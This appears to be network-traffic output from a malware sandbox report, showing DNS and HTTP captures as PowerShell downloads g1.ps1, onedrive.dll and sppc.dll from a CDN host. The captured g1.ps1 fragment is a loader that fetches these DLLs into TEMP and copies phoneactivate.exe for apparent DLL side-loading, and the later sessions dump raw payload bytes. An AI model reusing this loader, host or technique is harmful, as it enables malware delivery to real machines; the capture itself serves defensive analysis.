                                                  Dec 19, 2024 13:37:46.653059006 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:46.653337955 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:46.691617012 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:46.691687107 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:46.692004919 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:47.552505970 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:47.552601099 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:47.552809000 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:47.553894997 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:47.553894997 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:47.553913116 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:47.553922892 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:10.607677937 CET50013443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:10.607738972 CET4435001347.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:10.607803106 CET50013443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:10.608161926 CET50013443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:10.608176947 CET4435001347.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:12.292097092 CET4435001347.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:12.296469927 CET50013443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:12.296505928 CET4435001347.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:12.297063112 CET50013443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:12.297069073 CET4435001347.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:12.297096014 CET50013443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:12.297099113 CET4435001347.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:13.117785931 CET4435001347.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:13.117861986 CET4435001347.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:13.117913008 CET50013443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:13.118174076 CET50013443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:13.118191957 CET4435001347.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:43.192178011 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:43.192214966 CET4435001447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:43.192332029 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:43.192717075 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:43.192728043 CET4435001447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:44.866269112 CET4435001447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:44.866458893 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:44.868093014 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:44.868103027 CET4435001447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:44.868359089 CET4435001447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:44.903004885 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:44.903021097 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:44.903095961 CET4435001447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:45.749507904 CET4435001447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:45.749598026 CET4435001447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:45.751884937 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:45.751959085 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:45.751986027 CET4435001447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:45.752062082 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:45.752067089 CET4435001447.84.196.148192.168.2.4
Timestamp                             Source Port   Dest Port   Source IP     Dest IP
Dec 19, 2024 13:35:03.407418013 CET   62814         53          192.168.2.4   1.1.1.1
Dec 19, 2024 13:35:03.644972086 CET   53            62814       1.1.1.1       192.168.2.4

Timestamp                             Source IP     Dest IP   Trans ID   OP Code              Name               Type             Class         DNS over HTTPS
Dec 19, 2024 13:35:03.407418013 CET   192.168.2.4   1.1.1.1   0x2701     Standard query (0)   bangla.b-cdn.net   A (IP address)   IN (0x0001)   false

Timestamp                             Source IP   Dest IP       Trans ID   Reply Code     Name               CName   Address         Type             Class         DNS over HTTPS
Dec 19, 2024 13:35:03.644972086 CET   1.1.1.1     192.168.2.4   0x2701     No error (0)   bangla.b-cdn.net   -       89.35.237.170   A (IP address)   IN (0x0001)   false

• bangla.b-cdn.net
• 47.84.196.148
Session ID   Source IP     Source Port   Destination IP   Destination Port   PID    Process
0            192.168.2.4   49730         89.35.237.170    80                 7736   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                             Bytes transferred   Direction   Data
Dec 19, 2024 13:35:03.780405998 CET   167                 OUT         GET /g1.ps1 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: bangla.b-cdn.net
    Connection: Keep-Alive
Dec 19, 2024 13:35:05.215027094 CET   377                 IN          HTTP/1.1 301 Moved Permanently
    Date: Thu, 19 Dec 2024 12:35:04 GMT
    Content-Type: text/html
    Content-Length: 162
    Connection: keep-alive
    Server: BunnyCDN-RI1-892
    CDN-PullZone: 3104411
    CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90
    CDN-RequestCountryCode: US
    Location: https://bangla.b-cdn.net/g1.ps1
    CDN-RequestTime: 3
    CDN-RequestId: 935b33b2a9468066a0cbc683f6334969
Dec 19, 2024 13:35:05.458525896 CET   162                 IN          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID   Source IP     Source Port   Destination IP   Destination Port   PID    Process
1            192.168.2.4   49732         89.35.237.170    80                 7736   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                             Bytes transferred   Direction   Data
Dec 19, 2024 13:35:08.143022060 CET   149                 OUT         GET /onedrive.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: bangla.b-cdn.net
Dec 19, 2024 13:35:09.560062885 CET   545                 IN          HTTP/1.1 301 Moved Permanently
    Date: Thu, 19 Dec 2024 12:35:09 GMT
    Content-Type: text/html
    Content-Length: 162
    Connection: keep-alive
    Server: BunnyCDN-RI1-892
    CDN-PullZone: 3104411
    CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90
    CDN-RequestCountryCode: US
    Location: https://bangla.b-cdn.net/onedrive.dll
    CDN-RequestTime: 1
    CDN-RequestId: a474458c9503ef0abc31ab760a503b21
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Dec 19, 2024 13:35:12.302375078 CET   145                 OUT         GET /sppc.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: bangla.b-cdn.net
Dec 19, 2024 13:35:12.781531096 CET   541                 IN          HTTP/1.1 301 Moved Permanently
    Date: Thu, 19 Dec 2024 12:35:12 GMT
    Content-Type: text/html
    Content-Length: 162
    Connection: keep-alive
    Server: BunnyCDN-RI1-892
    CDN-PullZone: 3104411
    CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90
    CDN-RequestCountryCode: US
    Location: https://bangla.b-cdn.net/sppc.dll
    CDN-RequestTime: 0
    CDN-RequestId: 99090e4c8afe84a87363c15b798facd8
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID   Source IP     Source Port   Destination IP   Destination Port   PID    Process
0            192.168.2.4   49731         89.35.237.170    443                7736   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                 Bytes transferred   Direction   Data
2024-12-19 12:35:07 UTC   167                 OUT         GET /g1.ps1 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: bangla.b-cdn.net
    Connection: Keep-Alive
2024-12-19 12:35:07 UTC   670                 IN          HTTP/1.1 200 OK
    Date: Thu, 19 Dec 2024 12:35:07 GMT
    Content-Type: application/octet-stream
    Content-Length: 487
    Connection: close
    Server: BunnyCDN-RI1-892
    CDN-PullZone: 3104411
    CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90
    CDN-RequestCountryCode: US
    Cache-Control: max-age=25600000
    ETag: "676293cc-1e7"
    Last-Modified: Wed, 18 Dec 2024 09:20:12 GMT
    CDN-StorageServer: DE-679
    CDN-FileServer: 1004
    CDN-ProxyVer: 1.06
    CDN-RequestPullSuccess: True
    CDN-RequestPullCode: 200
    CDN-CachedAt: 12/19/2024 12:35:07
    CDN-EdgeStorageId: 892
    CDN-Status: 200
    CDN-RequestTime: 2
    CDN-RequestId: 2f3cb78fa05eb60c5199d1498c16a126
    CDN-Cache: MISS
    Accept-Ranges: bytes
2024-12-19 12:35:07 UTC   487                 IN          Data Raw: 24 75 72 6c 32 20 3d 20 27 62 61 6e 67 6c 61 2e 62 2d 63 64 6e 2e 6e 65 74 2f 6f 6e 65 64 72 69 76 65 2e 64 6c 6c 27 3b 20 24 75 72 6c 33 20 3d 20 27 62 61 6e 67 6c 61 2e 62 2d 63 64 6e 2e 6e 65 74 2f 73 70 70 63 2e 64 6c 6c 27 3b 24 73 6f 75 72 63 65 20 3d 20 22 43 3a 5c 57 69 6e 64 6f 77 73 5c 53 79 73 74 65 6d 33 32 5c 70 68 6f 6e 65 61 63 74 69 76 61 74 65 2e 65 78 65 22 3b 20 24 64 65 73 74 69 6e 61 74 69 6f 6e 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 54 45 4d 50 20 22 4f 6e 65 64 72 69 76 65 2e 65 78 65 22 3b 20 24 6f 75 74 70 75 74 50 61 74 68 32 20 3d 20 24 65 6e 76 3a 54 45 4d 50 20 2b 20 27 5c 6f 6e 65 64 72 69 76 65 2e 64 6c 6c 27 3b 20 24 6f 75 74 70 75 74 50 61 74 68 33 20 3d 20 24 65 6e 76 3a 54 45 4d 50 20 2b 20 27 5c 73 70 70
    Data Ascii: $url2 = 'bangla.b-cdn.net/onedrive.dll'; $url3 = 'bangla.b-cdn.net/sppc.dll';$source = "C:\Windows\System32\phoneactivate.exe"; $destination = Join-Path $env:TEMP "Onedrive.exe"; $outputPath2 = $env:TEMP + '\onedrive.dll'; $outputPath3 = $env:TEMP + '\spp


Session ID   Source IP     Source Port   Destination IP   Destination Port   PID    Process
1            192.168.2.4   49733         89.35.237.170    443                7736   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                 Bytes transferred   Direction   Data
2024-12-19 12:35:11 UTC   149                 OUT         GET /onedrive.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: bangla.b-cdn.net
2024-12-19 12:35:11 UTC   674                 IN          HTTP/1.1 200 OK
    Date: Thu, 19 Dec 2024 12:35:11 GMT
    Content-Type: application/octet-stream
    Content-Length: 103935
    Connection: close
    Server: BunnyCDN-RI1-892
    CDN-PullZone: 3104411
    CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90
    CDN-RequestCountryCode: US
    Cache-Control: max-age=25600000
    ETag: "67629393-195ff"
    Last-Modified: Wed, 18 Dec 2024 09:19:15 GMT
    CDN-StorageServer: DE-51
    CDN-FileServer: 1023
    CDN-ProxyVer: 1.06
    CDN-RequestPullSuccess: True
    CDN-RequestPullCode: 200
    CDN-CachedAt: 12/19/2024 12:35:11
    CDN-EdgeStorageId: 892
    CDN-Status: 200
    CDN-RequestTime: 0
    CDN-RequestId: 8f798816014220dfc16e7cc7464dcd65
    CDN-Cache: MISS
    Accept-Ranges: bytes
2024-12-19 12:35:11 UTC   15577               IN          Data Raw: b5 c1 04 0c 55 f0 75 07 79 fc d1 a8 79 c6 1e 66 04 1a 41 e1 e6 cc d5 db 56 f7 ef bb db 2a 7e 8f d3 22 66 76 2e 07 b3 39 82 d1 b4 07 f7 8b ef 50 63 b2 a4 7f 56 36 06 50 d4 78 09 2f 30 3b e4 50 8c 19 68 bd b8 0a 29 10 47 7a be 48 a6 cc 3b 5f e9 29 81 bf 9d db f7 c9 a5 73 28 6c 18 1d 8f c0 1b 79 68 9b b7 56 dc fa 4c 99 8a 63 ec 18 23 54 6a dd 1b 13 0b 3c 62 7f f6 93 fd 27 f0 61 a5 f5 33 da c7 16 03 7c da 99 57 b4 93 da f2 56 79 e4 c6 6b d2 a0 22 ed db ce ba 1f 39 d8 ed 7d 55 22 34 0d b0 f9 40 30 5a 34 5e eb 2d 05 dc 2d a5 db e6 f9 11 9c 2a 0b 23 8d a5 0b c6 a9 11 97 41 a7 c6 75 0e 92 93 92 a7 b9 f6 17 64 ab 37 17 18 a9 bc 0e 11 ff 7e 4e 81 a5 e6 c0 c1 78 df 4b 09 35 09 71 17 3d 06 a9 ae 26 3d 4e 3a c6 e5 17 34 b6 3c a6 92 9b 69 90 24 36 bd 34 9c 8b a2 f4 db
    Data Ascii: UuyyfAV*~"fv.9PcV6Px/0;Ph)GzH;_)s(lyhVLc#Tj<b'a3|WVyk"9}U"4@0Z4^--*#Aud7~NxK5q=&=N:4<i$64
2024-12-19 12:35:12 UTC   16384               IN          Data Raw: a1 3c 61 aa 16 a8 17 96 3a c2 ba e9 8a 61 85 a5 0f 83 7c 35 03 c9 44 74 6d 97 4f 28 6a 63 d7 b8 69 32 ff 6f c9 f6 51 39 18 85 00 ed dd 34 ea 2c cf 15 0e 28 ae 47 1e 88 3f d6 16 b5 77 2a 22 86 38 72 78 bd 0a 24 c1 3b ff b3 1d f3 a4 77 1f 3e 59 83 86 bc 6e 08 f8 d1 b9 01 79 21 ba 6f bd ba 81 01 b4 e2 d8 11 93 4b 37 c3 61 39 21 23 90 23 9b 31 ff fb e4 f0 a7 6a 18 43 53 ce 33 91 10 c7 44 c1 04 cd 8d 42 e1 b4 22 53 6c c1 21 da 7a fc 40 19 10 e4 82 ae d6 f0 89 c6 1e 6f 90 e4 04 ef d7 06 48 26 f8 d9 29 e0 8a 48 2b cd 20 ab ab ac 32 7e 0b 34 3f de 12 78 ca 16 68 44 20 22 e3 1e 54 29 8a 00 a5 a8 94 d9 df fa 39 29 ed c5 00 92 77 d8 78 1e a3 47 c2 7c 72 47 be c3 71 61 17 88 c9 55 7d cf b8 c9 56 32 3b 2a 7a 33 89 a4 c7 22 52 84 17 60 c6 dd f0 21 0b 51 61 40 de f7 e3
    Data Ascii: <a:a|5DtmO(jci2oQ94,(G?w*"8rx$;w>Yny!oK7a9!##1jCS3DB"Sl!z@oH&)H+ 2~4?xhD "T)9)wxG|rGqaU}V2;*z3"R`!Qa@
2024-12-19 12:35:12 UTC   16384               IN          Data Raw: fe 6c 15 05 a3 2b 6d b3 e9 a5 3d a7 5b 9f a9 3f 44 81 c2 26 2c b6 fa e5 91 c0 98 e9 89 85 6b e6 42 68 07 ed cc 41 5b de b2 a5 d3 b7 ff ea 65 3a f4 da 31 bb db 14 e8 3e 47 a9 71 8e 6d dc a4 4b 8c 9d c3 9b 1b 10 b8 89 3f bc 09 3e b6 fa fa 48 1d 92 9e e8 07 80 3f 56 05 ae bc a9 f9 b0 37 53 21 c0 3d 77 b6 ee 36 47 d6 c6 5c 4f 89 f2 1c c4 78 c8 06 5b c0 38 cc 1b 5e fe de da a0 5c 33 13 81 18 3b 7b 00 5a c0 ff f6 28 21 5b 66 47 8c 54 4c b9 d0 9c 4d df 8c 2e c0 e6 c4 46 ad 7b 45 8f 7e 9b b5 21 ec c2 35 ac e2 a4 53 d3 16 fb 9e 55 d1 95 cd 82 29 0d 46 ae 21 bc 31 e9 56 4d f1 bf 34 fa 60 0d 33 69 6f 91 85 19 49 b3 56 4b 62 ff 9d 65 08 c4 1d cf a4 bc 08 d0 2f 95 bc 89 92 17 3a e1 22 35 5d f5 c4 f5 08 6e 32 bc 88 58 60 98 dc 64 40 3d 8e fe ae b9 0c 14 1c 32 ab cf 8b
    Data Ascii: l+m=[?D&,kBhA[e:1>GqmK?>H?V7S!=w6G\Ox[8^\3;{Z(![fGTLM.F{E~!5SU)F!1VM4`3ioIVKbe/:"5]n2X`d@=2
2024-12-19 12:35:12 UTC   16384               IN          Data Raw: fc 92 8d a7 e9 97 29 92 78 52 97 74 52 64 8e 7a 68 5d f1 8f a6 53 97 7b 52 78 ca fc fa de 33 c0 50 6a de 8a dc a1 e2 68 bc 5e 23 ed fa 70 a6 a1 97 1d 80 5b d2 ee fd 63 e2 08 cd 75 5e fd 49 41 47 7d 00 72 18 49 fc 24 32 6d 52 d6 c6 4e 7b 59 e2 1c af fa 9d d5 c5 4d c2 16 d5 90 a8 19 78 dd c4 ae 91 42 cc f4 8e 66 1d 8c a2 9e 01 b7 13 17 45 e8 94 c8 33 29 ac 74 48 20 7c cc b5 cf 15 28 50 ca 33 18 3d 8f d6 36 e4 48 fa ea 4c 85 ac ab 08 fa e1 fa 03 5c 05 eb d9 d9 30 16 d7 00 32 5b 0d 01 30 f5 80 9e fd 5e ad af 6b 91 65 28 ad f3 63 d6 a9 7c fd 2c 51 32 3c 2c ab a4 75 d8 3a ee c3 dc 1e 72 6c f0 70 cc d1 51 20 19 47 93 93 46 58 3c bb 59 42 94 0f 2b 40 84 64 6a 74 7f d9 6b fe 8d d4 eb 0f b1 a8 2c a1 e2 0f 9e 00 7b 5e 8f 8d 8d 76 c2 46 00 99 6a df 0d dc 0e 87 e1 71
    Data Ascii: )xRtRdzh]S{Rx3Pjh^#p[cu^IAG}rI$2mRN{YMxBfE3)tH |(P3=6HL\02[0^ke(c|,Q2<,u:rlpQ GFX<YB+@djtk,{^vFjq
2024-12-19 12:35:12 UTC   16384               IN          Data Raw: 9e 31 77 e6 04 91 4f d7 c4 7d 97 5c df b4 76 15 6f 08 85 dd 01 5e 07 e5 a9 22 24 1b f3 06 02 ed 82 6c 27 c5 e7 36 8d 77 3e 7c 93 72 94 29 67 f8 ea 54 57 3c 72 8d e9 ec 03 15 58 22 d3 2f 5d 80 82 04 d1 d5 e9 18 f0 0f 3a 93 18 72 9a 76 82 ed 2f d6 d4 41 4f 18 a9 e0 1f 4a 14 45 7d e9 93 04 d4 6f 73 4d 25 1b d0 25 17 de a9 21 0a c3 6a a4 9e ad a4 e8 1a e5 1e 8d 8c 06 b4 6c 3f b8 58 0e 4e 9a 60 95 1a c2 48 13 d2 2b 97 3f 1f 0c 39 63 4d 42 a4 8d 3e 6f 32 43 b1 52 0f b7 16 ab c3 ce 4f 8a 5e b1 7c f3 6b 4e bc 00 e8 ba 84 fc 5c 56 3b 69 76 97 58 86 84 2f 0d 93 a5 d1 9e 40 3a ee 6f e4 80 87 47 03 78 3b 65 5f 01 97 9f fc 21 b2 a6 dc 30 79 60 f2 dc fe d9 f2 c7 23 0d ae 6c 9d 37 a4 dd 5e 09 29 0f e6 7e 43 7f 72 59 c6 ff 30 e9 6b ff cc a2 9c 90 e5 33 fa bf 34 68 b6 76
                                                  Data Ascii: 1wO}\vo^"$l'6w>|r)gTW<rX"/]:rv/AOJE}osM%%!jl?XN`H+?9cMB>o2CRO^|kN\V;ivX/@:oGx;e_!0y`#l7^)~CrY0k34hv
                                                  2024-12-19 12:35:12 UTC16384INData Raw: 54 0b 3a e6 4e 1a 34 25 96 1b 79 b6 95 54 db cd dc 6f da 2f fc 2d 79 7f 43 7f 7d c1 23 14 c3 cb 47 e1 01 83 03 a3 8f a2 2c 6d 6b 6d 49 ed 98 08 e7 54 46 5d db b6 3e aa a9 5c 29 5d 37 08 75 0c 64 bd d6 1f f5 64 c5 75 b4 09 f7 f6 5c 74 5b 1a 0b e3 51 2b 14 ee f3 65 22 d8 57 28 ce 9a 66 51 64 e8 fd cf 89 7a 4e 56 43 2c 2b df 36 77 f4 8a 3e 18 49 8f 73 36 8a 2f 12 45 29 07 1a 0a 49 a3 6d b9 bb 21 96 e5 6a a9 51 16 f0 29 ca ab eb 85 48 0c 66 ec 29 70 3c 7f 82 23 d9 5c 17 40 65 c4 7a 68 c0 37 87 83 e0 78 a9 ad ec ea e2 ec ee 4c 9f a7 ec c0 ea ef ad b1 fe fd 85 e1 08 66 96 12 00 53 10 0b 53 88 b8 94 81 cd 95 ca a4 60 20 e0 df fc dc 65 c4 d5 28 8f 48 eb 14 c9 80 12 62 c1 99 61 39 59 04 ff d4 8b 3d 85 16 28 90 8a 03 7f d1 a1 ef 88 9d 80 c0 3d 78 60 44 c0 ea 77 b1
                                                  Data Ascii: T:N4%yTo/-yC}#G,mkmITF]>\)]7uddu\t[Q+e"W(fQdzNVC,+6w>Is6/E)Im!jQ)Hf)p<#\@ezh7xLfSS` e(Hba9Y=(=x`Dw
                                                  2024-12-19 12:35:12 UTC6438INData Raw: 83 31 aa 15 fb 26 07 6a 15 47 a5 c0 78 d9 32 2a 49 cd 1a 3f 8d 73 65 de 3c 48 e6 89 57 4f eb 21 01 98 36 46 05 df 55 48 d8 db fe f3 6f 75 6e dc c8 f1 3a 40 b6 8f 8f ed 4f 07 0b d2 23 95 b0 6b fb bc c0 7d 80 d0 a4 1f c4 8f 7b 16 d1 02 69 f8 da ca b5 a7 fe 33 10 6d d8 87 74 79 74 7c 26 9b 87 1f d3 bd b1 23 f3 13 6c 18 5d 3c d9 a4 4a e0 11 53 14 f7 12 16 3e fb c4 1f bc 32 1c f3 b9 e9 02 1c c6 e5 24 68 fa f0 7e d4 29 ab b7 36 02 cf 9f fe 36 4b 8e 05 1d 94 d9 02 30 2b ec 4a 6a 67 65 ce db 33 1a 2c fa 5a 26 ea 67 2f ee ed 09 01 c2 99 45 96 ca 45 05 c9 04 b6 08 c5 cc b2 bd 80 df 9c 16 d5 44 57 da 7a 12 0a 29 10 57 65 7c f9 93 2a 0e 29 d6 65 17 10 46 e3 79 e0 70 b5 3c de 45 10 1d a6 cc 3f 0e f9 7d ea c7 29 18 40 5b 7d 2f aa 72 96 36 25 01 71 3e c2 64 0f 7f 91 8c
                                                  Data Ascii: 1&jGx2*I?se<HWO!6FUHoun:@O#k}{i3mtyt|&#l]<JS>2$h~)66K0+Jjge3,Z&g/EEDWz)We|*)eFyp<E?})@[}/r6%q>d


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  2 | 192.168.2.4 | 49734 | 89.35.237.170 | 443 | 7736 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-12-19 12:35:14 UTC | 145 | OUT | GET /sppc.dll HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                  Host: bangla.b-cdn.net
                                                  2024-12-19 12:35:15 UTC | 674 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:35:14 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 371712
                                                  Connection: close
                                                  Server: BunnyCDN-RI1-892
                                                  CDN-PullZone: 3104411
                                                  CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90
                                                  CDN-RequestCountryCode: US
                                                  Cache-Control: max-age=25600000
                                                  ETag: "67629392-5ac00"
                                                  Last-Modified: Wed, 18 Dec 2024 09:19:14 GMT
                                                  CDN-StorageServer: DE-587
                                                  CDN-FileServer: 976
                                                  CDN-ProxyVer: 1.06
                                                  CDN-RequestPullSuccess: True
                                                  CDN-RequestPullCode: 200
                                                  CDN-CachedAt: 12/19/2024 12:35:14
                                                  CDN-EdgeStorageId: 892
                                                  CDN-Status: 200
                                                  CDN-RequestTime: 2
                                                  CDN-RequestId: 13aaa1e16c9d036054fceb5edc545768
                                                  CDN-Cache: MISS
                                                  Accept-Ranges: bytes
                                                  2024-12-19 12:35:15 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3e 87 d9 e0 7a e6 b7 b3 7a e6 b7 b3 7a e6 b7 b3 31 9e b4 b2 7d e6 b7 b3 31 9e b2 b2 f6 e6 b7 b3 31 9e b3 b2 70 e6 b7 b3 6a 62 b4 b2 73 e6 b7 b3 6a 62 b3 b2 74 e6 b7 b3 6a 62 b2 b2 5a e6 b7 b3 31 9e b6 b2 79 e6 b7 b3 7a e6 b6 b3 12 e6 b7 b3 31 63 b3 b2 79 e6 b7 b3 31 63 b7 b2 7b e6 b7 b3 31 63 48 b3 7b e6 b7 b3 31 63 b5 b2 7b e6 b7 b3 52 69 63 68 7a e6 b7 b3 00 00 00 00 00 00 00
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$>zzz1}11pjbsjbtjbZ1yz1cy1c{1cH{1c{Richz
                                                  2024-12-19 12:35:15 UTC16384INData Raw: 4c 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 56 57 48 81 ec e8 00 00 00 48 8b 05 1c 34 05 00 48 33 c4 48 89 84 24 d0 00 00 00 48 8d 44 24 30 48 8d 0d 45 e6 03 00 48 8b f8 48 8b f1 b9 98 00 00 00 f3 a4 b8 08 00 00 00 48 6b c0 00 48 8d 0d 78 2a 00 00 48 89 4c 04 50 b8 08 00 00 00 48 6b c0 01 48 8b 8c 24 18 01 00 00 48 89 4c 04 50 b8 08 00 00 00 48 6b c0 02 48 8b 8c 24 20 01 00 00 48 89 4c 04 50 48 63 84 24 30 01 00 00 b9 08 00 00 00 48 6b c9 03 48 89 44 0c 50 b8 08 00 00 00 48 6b c0 04 48 8b 8c 24 10 01 00 00 48 89 4c 04 50 b8 08 00 00 00 48 6b c0 05 48 8b 8c 24 28 01 00 00 48 89 4c 04 50 b8 08 00 00 00 48 6b c0 06 48 8b 8c 24 08 01 00 00 48 89 4c 04 50 0f b6 84 24 50 01 00 00 b9 08 00 00 00 48 6b c9 07 48 89 44 0c 50 b8 08 00 00 00 48 6b c0
                                                  Data Ascii: LL$ LD$HT$HL$VWHH4H3H$HD$0HEHHHkHx*HLPHkH$HLPHkH$ HLPHc$0HkHDPHkH$HLPHkH$(HLPHkH$HLP$PHkHDPHk
